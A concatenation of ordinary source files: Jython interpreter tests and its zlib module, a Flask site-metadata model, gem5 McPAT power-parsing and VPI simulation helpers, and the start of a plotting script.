from java.math import BigInteger
from java.util import Vector
from javax import swing
from javatests import ListTest
class PyListTest(ListTest):
def __init__(self):
ListTest.__init__(self)
def newInstance(self, coll):
if coll is None:
return list()
else:
return list(coll)
def isReadOnly(self):
return False
class PyTupleTest(ListTest):
def __init__(self):
ListTest.__init__(self)
def newInstance(self, coll):
if coll is None:
return tuple()
else:
return tuple(coll)
def isReadOnly(self):
return True
class JythonBasicTests(unittest.TestCase):
def test_numbers(self):
self.assertEqual(abs(-2.), 2., 'Python float to Java double')
self.assertEqual(abs(-2), 2, 'Python int to Java long')
self.assertEqual(abs(-2), 2, 'Python long to Java long')
try:
abs(-123456789123456789123)
except TypeError:
pass
def test_strings(self):
self.assertEqual(Integer.valueOf('42'), 42,
'Python string to Java string')
def test_arrays(self):
chars = ['a', 'b', 'c']
self.assertEqual(String.valueOf(chars), 'abc', 'char array')
def test_enumerations(self):
vec = Vector()
items = list(range(10))
for i in items:
vec.addElement(i)
expected = 0
for i in vec:
self.assertEqual(i, expected,
'testing __iter__ on java.util.Vector')
expected = expected + 1
expected = 0
for i in iter(vec):
self.assertEqual(i, expected, 'testing iter(java.util.Vector)')
expected = expected + 1
def test_java_objects(self):
self.assertEqual(BigInteger('1234', 10).intValue(), 1234,
'BigInteger(string)')
self.assertEqual(BigInteger([0x11, 0x11, 0x11]).intValue(), 0x111111,
'BigInteger(byte[])')
self.assertEqual(BigInteger(-1, [0x11, 0x11, 0x11]).intValue(),
-0x111111, 'BigInteger(int, byte[])')
def test_call_static_methods(self):
s1 = String.valueOf(['1', '2', '3'])
s2 = String.valueOf('123')
s3 = String.valueOf(123)
s4 = String.valueOf(123)
s5 = String.valueOf(['0', '1', '2', '3', 'a', 'b'], 1, 3)
self.assertEqual(s1, s2)
self.assertEqual(s1, s3)
self.assertEqual(s1, s4)
self.assertEqual(s1, s5)
def test_call_instance_methods(self):
s = String('hello')
self.assertTrue(s.regionMatches(1, 1, 'ell', 0, 3),
'method call with boolean true')
self.assertTrue(s.regionMatches(0, 1, 'ell', 0, 3),
'method call with boolean false')
self.assertTrue(s.regionMatches(1, 'ell', 0, 3),
'method call no boolean')
self.assertTrue(s.regionMatches(1, 1, 'eLl', 0, 3),
'method call ignore case')
self.assertFalse(s.regionMatches(1, 'eLl', 0, 3), 'should ignore case')
def test_get_set(self):
d = Dimension(3, 9)
self.assertEqual(d.width, 3)
self.assertEqual(d.height, 9)
d.width = 42
self.assertEqual(d.width, 42)
self.assertEqual(d.height, 9)
try:
d.foo
except AttributeError:
pass
else:
raise AssertionError('d.foo should throw type error')
# Used in test_java_bean_properties.
flag = 0
def test_java_bean_properties(self):
b1 = swing.JButton()
b1.label = 'foo'
b2 = swing.JButton(label='foo')
self.assertEqual(b1.label, b2.label)
self.assertEqual(b1.label, 'foo')
# Test bean event properties - single and multiple
def testAction(event):
JythonBasicTests.flag += 1
doit = ActionEvent(b1, ActionEvent.ACTION_PERFORMED, "")
b1.actionPerformed = testAction
JythonBasicTests.flag = 0
b1.doClick()
self.assertEqual(
JythonBasicTests.flag, 1,
'expected one action per event but got %s' % JythonBasicTests.flag)
b1.actionPerformed.append(testAction)
JythonBasicTests.flag = 0
b1.doClick()
self.assertEqual(JythonBasicTests.flag, 2, 'two actions per event')
b1.actionPerformed = testAction
JythonBasicTests.flag = 0
b1.doClick()
self.assertEqual(JythonBasicTests.flag, 1,
'one actions per event - again')
def test_anonymous_inner_classes(self):
import javatests.AnonInner
x = javatests.AnonInner()
self.assertEqual(x.doit(), 2000)
def test_javalists(self):
# these first two tests just verify that we have a good unit test
alt = ListTest.getArrayListTest(False)
alt.testAll()
alt = ListTest.getArrayListTest(True)
alt.testAll()
# Now run the tests
plt = PyListTest()
plt.testAll()
ptt = PyTupleTest()
ptt.testAll()
def test_main():
support.run_unittest(JythonBasicTests)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_listcomp_jy.py
```python
import unittest
from test import support
class ListCompTestCase(unittest.TestCase):
#http://bugs.jython.org/issue1205
def test_long_listcomp(self):
#for a long list comp, we compute the Hardy-Ramanujan number
#http://en.wikipedia.org/wiki/1729_(number)
res = [(x1**3+x2**3, (x1, x2), (y1, y2))
for x1 in range(20) for x2 in range(20) if x1 < x2 # x-Paare
for y1 in range(20) for y2 in range(20) if y1 < y2 # y-Paare
if x1**3+x2**3 == y1**3+y2**3 # gleiche Summe
if (x1, x2) < (y1, y2)
]
self.assertEqual(1729, min(res)[0])
self.assertEqual(len(res), 2)
def test_main():
support.run_unittest(ListCompTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_re_jy.py
```python
import re
import sys
import unittest
import test.support
import unicodedata
from unicodedata import category
class ReTest(unittest.TestCase):
def test_bug_1140_addendum(self):
result = re.sub('', lambda match : None, 'foo')
self.assertEqual(result, 'foo')
self.assertTrue(isinstance(result, str))
def test_sub_with_subclasses(self):
class Foo(str):
def join(self, items):
return Foo(str.join(self, items))
result = re.sub('bar', 'baz', Foo('bar'))
self.assertEqual(result, 'baz')
self.assertEqual(type(result), str)
class Foo2(str):
def join(self, items):
return Foo2(str.join(self, items))
def __getslice__(self, start, stop):
return Foo2(str.__getslice__(self, start, stop))
result = re.sub('bar', 'baz', Foo2('bar'))
self.assertEqual(result, Foo2('baz'))
self.assertTrue(isinstance(result, Foo2))
def test_unkown_groupname(self):
self.assertRaises(IndexError,
re.match(r'(?P<int>\d+)\.(\d*)', '3.14').group,
'misspelled')
def test_whitespace(self):
# Test for http://bugs.jython.org/issue2226 - verify against cpython
ws_re = re.compile(r'\s')
not_ws_re = re.compile(r'\S')
cpython_ascii_whitespace = set(' \t\n\r\f\v')
for i in range(256):
c = chr(i)
if c in cpython_ascii_whitespace:
self.assertRegex(c, ws_re)
self.assertNotRegexpMatches(c, not_ws_re)
else:
self.assertNotRegexpMatches(c, ws_re)
self.assertRegex(c, not_ws_re)
def test_unicode_whitespace(self):
# Test for http://bugs.jython.org/issue2226
ws_re = re.compile(r'\s', re.UNICODE)
not_ws_re = re.compile(r'\S', re.UNICODE)
separator_categories = set(['Zl', 'Zp', 'Zs'])
separators = {chr(c) for c in [28, 29, 30, 31]}
special = set([
unicodedata.lookup('MONGOLIAN VOWEL SEPARATOR'),
'\u0085', # NEXT LINE (NEL)
])
cpython_whitespace = set(' \t\n\r\f\v') | separators | special
for i in range(0xFFFF): # could test to sys.maxunicode, but does not appear to be necessary
if i >= 0xD800 and i <= 0xDFFF:
continue
c = chr(i)
if c in cpython_whitespace or category(c) in separator_categories:
self.assertRegex(c, ws_re)
self.assertNotRegexpMatches(c, not_ws_re)
else:
self.assertNotRegexpMatches(c, ws_re)
self.assertRegex(c, not_ws_re)
def test_main():
test.support.run_unittest(ReTest)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_stringmap.py
```python
import unittest
from test import support
from test_userdict import TestMappingProtocol
from org.python.core import PyStringMap
class SimpleClass:
pass
class StringMapTest(TestMappingProtocol):
_tested_class = None
class ClassDictTests(StringMapTest):
"""Check that class dicts conform to the mapping protocol"""
def _empty_mapping(self):
for key in SimpleClass.__dict__.copy():
SimpleClass.__dict__.pop(key)
return SimpleClass.__dict__
class InstanceDictTests(StringMapTest):
def _empty_mapping(self):
return SimpleClass().__dict__
class PyStringMapTest(StringMapTest):
_tested_class = PyStringMap
def test_all(self):
d = PyStringMap()
# Test __setitem__
d["one"] = 1
# Test __getitem__
self.assertEqual(d["one"], 1)
self.assertRaises(KeyError, d.__getitem__, "two")
# Test __delitem__
del d["one"]
self.assertRaises(KeyError, d.__delitem__, "one")
# Test clear
d.update(self._reference())
d.clear()
self.assertEqual(d, {})
# Test copy()
d.update(self._reference())
da = d.copy()
self.assertEqual(d, da)
# Test keys, items, values
r = self._reference()
d.update(self._reference())
for k in list(d.keys()):
self.assertTrue(k in list(r.keys()))
for i in list(d.items()):
self.assertTrue(i in list(r.items()))
for v in list(d.values()):
self.assertTrue(v in list(r.values()))
# Test has_key and "in".
for i in list(r.keys()):
self.assertTrue(i in d)
self.assertTrue(i in d)
# Test unhashability
self.assertRaises(TypeError, hash, d)
def test_stringmap_in_mapping(self):
class A:
def __init__(self):
self.a = "a"
self.assertEqual("a", "%(a)s" % A().__dict__)
def test_main():
support.run_unittest(
ClassDictTests,
InstanceDictTests,
PyStringMapTest
)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_str_jy.py
```python
from test import support
import java.lang
import unittest
class WrappedStrCmpTest(unittest.TestCase):
def testWrappedWorksAsKey(self):
'''Test for http://jython.org/bugs/1816134
PyString's equal used to check for str explicitly, so Wrapper's __cmp__ wasn't used
and a KeyError would be raised by the lookup on ABC.
'''
class Wrapper(object):
def __init__(self, content):
self.content = content
def __hash__(self):
return hash(self.content)
def __cmp__(self, other):
if isinstance(other, Wrapper):
return cmp(self.content, other.content)
return cmp(self.content, other)
d = {'ABC' : 1}
ABC = Wrapper('ABC')
self.assertEqual(1, d[ABC])
class StrConstructorTest(unittest.TestCase):
def test_int_to_string_format(self):
# 0.001 comes out as 0.0010
self.assertEqual(str(0.001), "0.001")
def test_unicode_resistance(self):
# Issue 2037: prevent byte/str elements > 255
self.assertRaises(UnicodeEncodeError, str, java.lang.String("caf\xe9 noir"))
self.assertRaises(UnicodeEncodeError, str, java.lang.String("abc\u0111efgh"))
class StringSlicingTest(unittest.TestCase):
def test_out_of_bounds(self):
try:
"a"[10:]
except StringOutOfBoundsError:
self.fail("str slice threw StringOutOfBoundsError")
class FormatTest(unittest.TestCase):
def test_add_zeros(self):
# 2 "%012d" % -4 displays '0000000000-4'
s = "%012d" % -4
self.assertEqual(s, "-00000000004")
def test_format(self):
"%#.0f, %e and %+f w/ negative numbers print correctly."
self.assertEqual("%.1f" % 5, "5.0")
self.assertEqual("%e" % -1e-6, "-1.000000e-06")
self.assertEqual("%e" % 0, "0.000000e+00")
self.assertEqual("%e" % 1e-6, "1.000000e-06")
self.assertEqual("%+f" % -5, "-5.000000")
self.assertEqual("%+f" % 5, "+5.000000")
def test_format_issue2075(self):
self.assertEqual("%#018x" % 14, "0x000000000000000e")
self.assertEqual("{:#018x}".format(14), "0x000000000000000e")
self.assertEqual("{:+#018X}".format(14), "+0X00000000000000E")
self.assertEqual("{:#018X}".format(-14), "-0X00000000000000E")
def test_argument_count_exception(self):
"exception thrown when too many or too few arguments for format string"
foo = False
try:
r = '%d' % (1, 2)
except TypeError as e:
self.assertTrue("not all arguments converted" in str(e))
try:
r = '%d%d' % 1
except TypeError as e:
self.assertTrue("not enough arguments for format string" in str(e))
try:
s = '%d%d' % (1,)
except TypeError as e:
self.assertTrue("not enough arguments for format string" in str(e))
def test_unicode_arg(self):
# When the right-side operand is a unicode, the result should be unicode
# too
self.assertEqual("%s" % "foo", "foo")
self.assertEqual("%s" % "\u00e7", "\u00e7")
def test_unicode_in_args(self):
# When at least one of the right-side operands is a unicode, the result
# should be unicode too
self.assertEqual("%s %s" % ("foo", "bar"), "foo bar")
self.assertEqual("%s %s" % ("foo", "bar"), "foo bar")
class S(object):
def __str__(self): return "str"
def __unicode__(self): return "unicode"
# Also, once a unicode has been found, next args should be __unicode__'d
self.assertEqual("%s %s %s" % ("foo", "bar", S()), "foo bar unicode")
# But, args found before the first unicode should not be __unicode__'d
self.assertEqual("%s %s %s" % (S(), "bar", S()), "str bar unicode")
class DisplayTest(unittest.TestCase):
def test_str_and_repr(self):
class s(str):
pass
class u(str):
pass
for cls in str, s, str, u:
foo = cls('foo')
for expr in 'str(foo)', 'foo.__str__()':
result = eval(expr)
self.assertTrue(isinstance(result, str))
self.assertEqual(result, 'foo')
for expr in 'repr(foo)', 'foo.__repr__()':
result = eval(expr)
self.assertTrue(isinstance(result, str))
if issubclass(cls, str):
self.assertEqual(result, "u'foo'")
else:
self.assertEqual(result, "'foo'")
def test_basic_escapes(self):
test = '\r\n\tfoo\a\b\f\v'
self.assertEqual(repr(test), "'\\r\\n\\tfoo\\x07\\x08\\x0c\\x0b'")
self.assertEqual(repr(str(test)), "u'\\r\\n\\tfoo\\x07\\x08\\x0c\\x0b'")
test2 = "'bar"
self.assertEqual(repr(test2), '"\'bar"')
self.assertEqual(repr(str(test2)), 'u"\'bar"')
class ParserTest(unittest.TestCase):
def test_parse_str(self):
foo = 'ą\n'
self.assertEqual(len(foo), 3, repr(foo))
self.assertEqual(repr(foo), "'\\xc4\\x85\\n'")
self.assertEqual(ord(foo[0]), 196)
self.assertEqual(ord(foo[1]), 133)
self.assertEqual(ord(foo[2]), 10)
bar = foo.decode('utf-8')
self.assertEqual(len(bar), 2)
self.assertEqual(repr(bar), "u'\\u0105\\n'")
self.assertEqual(ord(bar[0]), 261)
self.assertEqual(ord(bar[1]), 10)
def test_parse_raw_str(self):
foo = r'ą\n'
self.assertEqual(len(foo), 4, repr(foo))
self.assertEqual(repr(foo), "'\\xc4\\x85\\\\n'")
self.assertEqual(ord(foo[0]), 196)
self.assertEqual(ord(foo[1]), 133)
self.assertEqual(ord(foo[2]), 92)
self.assertEqual(ord(foo[3]), 110)
bar = foo.decode('utf-8')
self.assertEqual(len(bar), 3)
self.assertEqual(repr(bar), "u'\\u0105\\\\n'")
self.assertEqual(ord(bar[0]), 261)
self.assertEqual(ord(bar[1]), 92)
self.assertEqual(ord(bar[2]), 110)
def test_main():
support.run_unittest(
WrappedStrCmpTest,
StrConstructorTest,
StringSlicingTest,
FormatTest,
DisplayTest,
ParserTest)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_traceback_jy.py
```python
import sys
import traceback
import unittest
from test import support
if support.is_jython:
from java.awt import EventQueue
from java.lang import Runnable
class TracebackTestCase(unittest.TestCase):
def test_tb_across_threads(self):
if not support.is_jython:
return
# http://bugs.jython.org/issue1533624
class PyRunnable(Runnable):
def run(self):
raise TypeError('this is only a test')
try:
EventQueue.invokeAndWait(PyRunnable())
except TypeError:
self.assertEqual(tb_info(),
[('test_tb_across_threads',
'EventQueue.invokeAndWait(PyRunnable())'),
('run',
"raise TypeError('this is only a test')")])
else:
self.fail('Expected TypeError')
def test_reraise(self):
def raiser():
raise Exception().with_traceback(tb)
try:
# Jython previously added raiser's frame to the traceback
raiser()
except Exception:
self.assertEqual(tb_info(),
[('test_reraise', 'raiser()'),
('<module>', "raise Exception('foo')")])
else:
self.fail('Expected Exception')
def test_extract_stack(self):
# http://bugs.jython.org/issue437809
traceback.extract_stack()
def test_except_around_raising_call(self):
"""[ #452526 ] traceback lineno is the except line"""
from test import except_in_raising_code
try:
except_in_raising_code.foo()
except NameError:
tb = sys.exc_info()[2]
self.assertEqual(6, tb.tb_next.tb_lineno)
else:
self.fail("Should've raised a NameError")
try:
raise Exception('foo')
except Exception:
tb = sys.exc_info()[2]
def tb_info():
# [2:] ignores filename/lineno
return [info[2:] for info in traceback.extract_tb(sys.exc_info()[2])]
def test_main():
support.run_unittest(TracebackTestCase)
if __name__ == '__main__':
test_main()
```
#### File: Lib/test/test_weakref_jy.py
```python
import unittest
import weakref
from test import support
from test_weakref import extra_collect
class ReferencesTestCase(unittest.TestCase):
def test___eq__(self):
class Foo(object):
def __eq__(self, other):
return True
def __hash__(self):
return hash('foo')
foo1, foo2 = Foo(), Foo()
ref1, ref2 = weakref.ref(foo1), weakref.ref(foo2)
self.assertTrue(ref1() is foo1)
self.assertTrue(ref2() is foo2)
def test___hash__call(self):
hash_called = []
class Bar(object):
def __hash__(self):
hash = object.__hash__(self)
hash_called.append(hash)
return hash
bar = Bar()
ref = weakref.ref(bar)
self.assertFalse(hash_called)
hash(ref)
self.assertEqual(len(hash_called), 1)
hash(ref)
self.assertEqual(len(hash_called), 1)
self.assertEqual(hash(bar), hash(ref))
self.assertEqual(len(hash_called), 2)
class ArgsTestCase(unittest.TestCase):
# XXX consider adding other tests for dict, list, etc
def test_python_fn_kwargs(self):
weakrefs = []
sentinel = []
def watch(obj, kwarg=True):
self.assertEqual(kwarg, True)
# log the death of the reference by appending to the sentinel
ref = weakref.ref(obj, sentinel.append)
weakrefs.append(ref)
self.assertTrue(not sentinel)
thunk1 = lambda: None
watch(thunk1)
self.assertTrue(not sentinel)
del thunk1
extra_collect()
self.assertTrue(sentinel)
del sentinel[:]
thunk2 = lambda: None
watch(thunk2, kwarg=True) # <--- only difference: called with a kwarg
self.assertTrue(not sentinel)
del thunk2
extra_collect()
self.assertTrue(sentinel)
def test_main():
support.run_unittest(ReferencesTestCase, ArgsTestCase)
if __name__ == '__main__':
test_main()
```
#### File: jython/Lib/zlib.py
```python
import array
import binascii
import jarray
from io import StringIO
from java.lang import Long, String, System
from java.util.zip import Adler32, Deflater, Inflater, DataFormatException
class error(Exception):
pass
DEFLATED = 8
MAX_WBITS = 15
DEF_MEM_LEVEL = 8
ZLIB_VERSION = "1.1.3"
Z_BEST_COMPRESSION = 9
Z_BEST_SPEED = 1
Z_FILTERED = 1
Z_HUFFMAN_ONLY = 2
Z_DEFAULT_COMPRESSION = -1
Z_DEFAULT_STRATEGY = 0
# Most options are removed because java does not support them
# Z_NO_FLUSH = 0
# Z_SYNC_FLUSH = 2
# Z_FULL_FLUSH = 3
Z_FINISH = 4
_valid_flush_modes = (Z_FINISH,)
def adler32(s, value=1):
if value != 1:
raise ValueError("adler32 only support start value of 1")
checksum = Adler32()
checksum.update(String.getBytes(s, 'iso-8859-1'))
return Long(checksum.getValue()).intValue()
def crc32(string, value=0):
return binascii.crc32(string, value)
def compress(string, level=6):
if level < Z_BEST_SPEED or level > Z_BEST_COMPRESSION:
raise error("Bad compression level")
deflater = Deflater(level, 0)
try:
string = _to_input(string)
deflater.setInput(string, 0, len(string))
deflater.finish()
return _get_deflate_data(deflater)
finally:
deflater.end()
def decompress(string, wbits=0, bufsize=16384):
inflater = Inflater(wbits < 0)
try:
inflater.setInput(_to_input(string))
return _get_inflate_data(inflater)
finally:
inflater.end()
class compressobj(object):
# all jython uses wbits for is deciding whether to skip the header if it's negative
def __init__(self, level=6, method=DEFLATED, wbits=MAX_WBITS,
memLevel=0, strategy=0):
if abs(wbits) > MAX_WBITS or abs(wbits) < 8:
raise ValueError("Invalid initialization option")
self.deflater = Deflater(level, wbits < 0)
self.deflater.setStrategy(strategy)
if wbits < 0:
_get_deflate_data(self.deflater)
self._ended = False
def compress(self, string):
if self._ended:
raise error("compressobj may not be used after flush(Z_FINISH)")
string = _to_input(string)
self.deflater.setInput(string, 0, len(string))
return _get_deflate_data(self.deflater)
def flush(self, mode=Z_FINISH):
if self._ended:
raise error("compressobj may not be used after flush(Z_FINISH)")
if mode not in _valid_flush_modes:
raise ValueError("Invalid flush option")
self.deflater.finish()
last = _get_deflate_data(self.deflater)
if mode == Z_FINISH:
self.deflater.end()
self._ended = True
return last
class decompressobj(object):
def __init__(self, wbits=MAX_WBITS):
# Jython only uses wbits to determine to skip the header if it's negative;
# but apparently there are some tests around this that we do some bogus
# param checking
if abs(wbits) < 8:
raise ValueError("Invalid initialization option")
if abs(wbits) > 16: # NOTE apparently this also implies being negative in CPython/zlib
wbits = -1
self.inflater = Inflater(wbits < 0)
self._ended = False
self.unused_data = ""
self.unconsumed_tail = ""
self.gzip = wbits < 0
self.gzip_header_skipped = False
def decompress(self, string, max_length=0):
if self._ended:
raise error("decompressobj may not be used after flush()")
# unused_data is always "" until inflation is finished; then it is
# the unused bytes of the input;
# unconsumed_tail is whatever input was not used because max_length
# was exceeded before inflation finished.
# Thus, at most one of {unused_data, unconsumed_tail} may be non-empty.
self.unused_data = ""
self.unconsumed_tail = ""
if max_length < 0:
raise ValueError("max_length must be a positive integer")
# Suppress gzip header if present and wbits < 0
if self.gzip and not self.gzip_header_skipped:
string = _skip_gzip_header(string)
self.gzip_header_skipped = True
string = _to_input(string)
self.inflater.setInput(string)
inflated = _get_inflate_data(self.inflater, max_length)
r = self.inflater.getRemaining()
if r:
if max_length:
self.unconsumed_tail = string[-r:]
else:
self.unused_data = string[-r:]
return inflated
def flush(self, length=None):
# FIXME close input streams if gzip
if self._ended:
raise error("decompressobj may not be used after flush()")
if length is None:
length = 0
elif length <= 0:
raise ValueError('length must be greater than zero')
last = _get_inflate_data(self.inflater, length)
self.inflater.end()
return last
def _to_input(string):
return string.tostring() if isinstance(string, array.array) else string
def _get_deflate_data(deflater):
buf = jarray.zeros(1024, 'b')
s = StringIO()
while not deflater.finished():
l = deflater.deflate(buf)
if l == 0:
break
s.write(String(buf, 0, 0, l))
s.seek(0)
return s.read()
def _get_inflate_data(inflater, max_length=0):
buf = jarray.zeros(1024, 'b')
s = StringIO()
total = 0
while not inflater.finished():
try:
if max_length:
l = inflater.inflate(buf, 0, min(1024, max_length - total))
else:
l = inflater.inflate(buf)
except DataFormatException as e:
raise error(str(e))
if l == 0:
break
total += l
s.write(String(buf, 0, 0, l))
if max_length and total == max_length:
break
s.seek(0)
return s.read()
FTEXT = 1
FHCRC = 2
FEXTRA = 4
FNAME = 8
FCOMMENT = 16
def _skip_gzip_header(string):
# per format specified in http://tools.ietf.org/html/rfc1952
# could we use bytearray instead?
s = array.array("B", string)
id1 = s[0]
id2 = s[1]
# Check gzip magic
if id1 != 31 or id2 != 139:
return string
cm = s[2]
flg = s[3]
mtime = s[4:8]
xfl = s[8]
os = s[9]
# skip fixed header, then figure out variable parts
s = s[10:]
if flg & FEXTRA:
# skip extra field
xlen = s[0] + s[1] * 256 # MSB ordering
s = s[2 + xlen:]
if flg & FNAME:
# skip filename
s = s[s.find("\x00")+1:]
if flg & FCOMMENT:
# skip comment
s = s[s.find("\x00")+1:]
if flg & FHCRC:
# skip CRC16 for the header - might be nice to check of course
s = s[2:]
return s.tostring()
``` |
{
"source": "jimmyzang/flask_book",
"score": 2
} |
#### File: app/models/site.py
```python
from app.models.model import *
#from sqlalchemy.dialects.mysql import LONGTEXT
from sqlalchemy.dialects.sqlite import TEXT
PREFIX = "site_"
class SiteMeta(db.Model):
""" Site table """
__tablename__ = db.PREFIX + PREFIX + "meta"
__table_args__ = {
"mysql_engine": "InnoDB",
"mysql_charset": "utf8"
}
id = db.Column(db.Integer, primary_key = True, nullable = False)
name = db.Column(db.String(255), nullable = False, index = True)
value = db.deferred(db.Column(TEXT, default="", nullable = False))
@staticmethod
def add(data):
for name, value in data.items():
meta = SiteMeta.query.filter_by(name=name).first()
if meta is not None:
continue
meta = SiteMeta(name=name, value=value)
db.session.add(meta)
db.session.commit()
@staticmethod
def setting(data):
for name, value in data.items():
meta = SiteMeta.query.filter_by(name=name).first()
if not meta:
meta = SiteMeta(name=name, value=value)
db.session.add(meta)
return
meta.value = value
db.session.commit()
@staticmethod
def all():
return SiteMeta.query.all()
``` |
{
"source": "JimmyZhang12/gem5",
"score": 2
} |
#### File: m5/mcpat/util.py
```python
import os
import sys
import re
import pickle
import subprocess
import math
from file_read_backwards import FileReadBackwards
from collections import defaultdict
from m5.SimObject import SimObject
from m5.util import fatal
from m5.params import *
from node import Node
from device import Device
from epoch import Epoch
def parse_output(output_file):
def strip_header(lines):
start = False
ret = []
for line in lines:
if("Processor:" in line):
start = True
if start:
ret.append(line)
return ret
def strip_space(lines):
ret = []
last_line_star = False
start_core = False
for line in lines:
if "Core:" in line:
start_core = True
if last_line_star:
#Fix spacing after ******
ret.append(" "+line)
last_line_star = False
elif "*****" in line:
last_line_star = True
elif "Device Type=" in line or " Local Predictor:" in line:
continue
else:
if last_line_star:
#Fix spacing after ******
ret.append(" "+line)
last_line_star = False
elif start_core:
ret.append(line.replace(" ", "", 2))
else:
ret.append(line)
return ret
def line_to_dict(line):
ret = {}
temp = line.split(":")[0].split("=")
ret["lspace"] = len(temp[0]) - len(temp[0].lstrip())
return ret
def split_list(lines):
core_id = 0
ret = []
sub = []
for i in lines:
if "Core:" in i:
i = i.replace("Core:", "Core"+str(core_id)+":")
core_id += 1
if i == "\n":
ret.append(sub)
sub = []
else:
sub.append(i.rstrip())
return ret
def to_devices(intermediate_dev_list):
ret = []
for dev in intermediate_dev_list:
data = {}
#print(dev)
for attr in dev[1:]:
data[attr.split("=")[0].strip()] = attr.split("=")[1].strip()
ret.append(Device(dev[0].split(":")[0].strip(), data, \
int(math.floor((len(dev[0]) - len(dev[0].lstrip()))/2))))
if ret[-1].depth == 4:
ret[-1].depth = 3
if ret[-1].depth == 5:
ret[-1].depth = 3
if ret[-1].depth == 6:
ret[-1].depth = 4
return ret
""" Returns an Epochs """
with open(output_file, "r") as of:
lines = of.readlines()
lines = strip_header(lines)
lines = strip_space(lines)
temp = split_list(lines)
dev_list = to_devices(temp)
epoch = Epoch(dev_list)
return epoch
#first time running mcpat?
first_time = True
def run_mcpat(xml, print_level, opt_for_clk, ofile, errfile):
global first_time
from m5 import options
mcpat_output_path = os.path.join(options.mcpat_out,
options.mcpat_testname)
mcpat_exe = os.path.join(options.mcpat_path, "mcpat")
mcpat_serial = os.path.join(mcpat_output_path, "mcpat_serial.txt")
#if first time first generate a checkpoint before mcpat calculation
if(first_time):
mcpat = [mcpat_exe,
"-i",
xml,
"-p",
"5",
"--serial_create=true",
"--serial_file="+mcpat_serial]
first_time = False
# print("FIRSTIME")
# print(" ".join(mcpat))
# print(mcpat)
with open(ofile, "w") as ostd, open(errfile, "w") as oerr:
p = subprocess.Popen(mcpat, stdout=ostd, stderr=oerr)
p.wait()
mcpat = [mcpat_exe,
"-i",
xml,
"-p",
"5",
"--serial_restore=true",
"--serial_file="+mcpat_serial]
with open(ofile, "w") as ostd, open(errfile, "w") as oerr:
p = subprocess.Popen(mcpat, stdout=ostd, stderr=oerr)
p.wait()
def get_data(path, mcpat_trees):
data = {}
def filter(value):
if "nan" in value.split(" ")[0] or "inf" in value.split(" ")[0]:
# McPAT Messed Up?
return "0"
else:
return value.split(" ")[0]
for key, value in mcpat_trees[-1].find(path).data.items():
data[key] = filter(value.split(" ")[0])
return data
def calc_total_power(data, power_gating = False, scale_factor=1.0):
# Add Runtime Dynamic to Gate Leakage and Subthreshold Leakage with Power
# Gating
print("calc_total_power=",power_gating)
print("gate leakage ", float(data["Gate Leakage"]))
print("Subthreshold Leakage with power gating ", float(data["Subthreshold Leakage with power gating"]))
print("Runtime Dynamic ", float(data["Runtime Dynamic"]))
print("sum ", float(data["Gate Leakage"]) + \
float(data["Subthreshold Leakage with power gating"]) + \
float(data["Runtime Dynamic"])*scale_factor)
if power_gating:
return (float(data["Gate Leakage"]) + \
float(data["Subthreshold Leakage with power gating"]) + \
float(data["Runtime Dynamic"]))*scale_factor
return (float(data["Gate Leakage"]) + \
float(data["Subthreshold Leakage"]) + \
float(data["Runtime Dynamic"]))*scale_factor
def calc_req(power, voltage):
return voltage*voltage/power
def dump_stats(mcpat_trees):
''' Dumps the tree data to csv '''
from m5 import options
mcpat_output_path = os.path.join(options.mcpat_out,
options.mcpat_testname)
testname = options.mcpat_testname
cfile = os.path.join(mcpat_output_path, testname+"_all.csv")
sfile = os.path.join(mcpat_output_path, testname+".csv")
with open(sfile, "w") as csv, \
open(cfile, "w") as full_dump:
i = 0
# Print the header line:
mcpat_trees[0].print_csv_line_header(full_dump)
# Print the header line:
for epoch in mcpat_trees:
epoch.print_csv_line_data(full_dump)
data = get_data("Processor", mcpat_trees)
# Calculate Total Power:
power = calc_total_power(data)
data = []
req = calc_req(power, 1.0)
data.append(str(i*float(options.power_profile_interval)))
data.append(str(req))
data.append(str(power))
csv.write(",".join(data)+"\n")
i+=1
```
#### File: m5/vpi_shm/__init__.py
```python
import math
import os
import sys
import re
import subprocess
import math
from threading import Thread
from time import sleep
import _m5.vpi_shm as vpi
thread = None
valid_pdn_types = ["HARVARD", "HARVARD_M", "HARVARD_L",
"HARVARD_D", "ARM", "INTEL_M", "INTEL_DT"]
def initialize(name):
from m5 import options
pdn_type = options.power_supply_type
if pdn_type not in valid_pdn_types:
pdn_types = ",".join(valid_pdn_types)
print("Error, Invalid PDN Type: \""+
pdn_type+"\", must be of type: "+pdn_types)
sys.exit(1)
time_to_next = str(vpi.get_time_to_next())+"p"
global thread
""" This function will launch the docker container for the verilog
simulation. """
def run_command(command):
process = subprocess.Popen(command, stdout=subprocess.PIPE)
while True:
output = process.stdout.readline()
if output == '' and process.poll() is not None:
break
#if output:
#print(output.strip(), flush=True)
rc = process.poll()
return rc
def verilog_thread(name, pdn_type, ttn):
""" This is the thread function for executing the verilog sim """
run_command([os.path.join(options.ncverilog_path,"run_cadence.sh"), \
name, pdn_type, ttn])
if os.path.exists(os.path.join("/dev/shm", name)):
os.remove(os.path.join("/dev/shm", name))
thread = Thread(target=verilog_thread, args=[name, pdn_type, \
time_to_next])
thread.setDaemon(True)
thread.start()
# Wait for the container to launch and the sim to run
while not os.path.isfile(os.path.join("/dev/shm", name)):
sleep(1)
vpi.create_shm(0, name)
return
def set_driver_signals(load, term_sim, i=0):
vpi.set_driver_signals(load, term_sim, i)
def get_voltage():
return vpi.get_voltage()
def get_current():
return vpi.get_current()
def ack_supply():
return vpi.ack_supply()
def mp_get_freq(i = 0):
return vpi.mp_get_freq(i)
def mp_get_voltage_set(i = 0):
return vpi.mp_get_voltage_set()
def mp_get_ncores():
return vpi.mp_get_ncores()
def stop():
subprocess.Popen(['reset']).wait()
``` |
{
"source": "JimmyZhang12/predict-T",
"score": 2
} |
#### File: deprecated/analysis/i_plot_mc.py
```python
import pandas as pd
import glob
import numpy as np
import math
import sys
import matplotlib.pyplot as plt
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('--input', type=str, default="", help="input path")
parser.add_argument('--warmup', type=int, default=1, help="time in nanoseconds of the warmup")
args = parser.parse_args()
def get_files(path):
files = glob.glob(path+"/*.csv")
files = [i for i in files]
files.sort()
return files
def get_names(files):
names = []
for file in files:
if "SMALL" in file:
names.append("SMALL")
if "MEDIUM" in file:
names.append("MEDIUM")
if "LARGE" in file:
names.append("LARGE")
return names
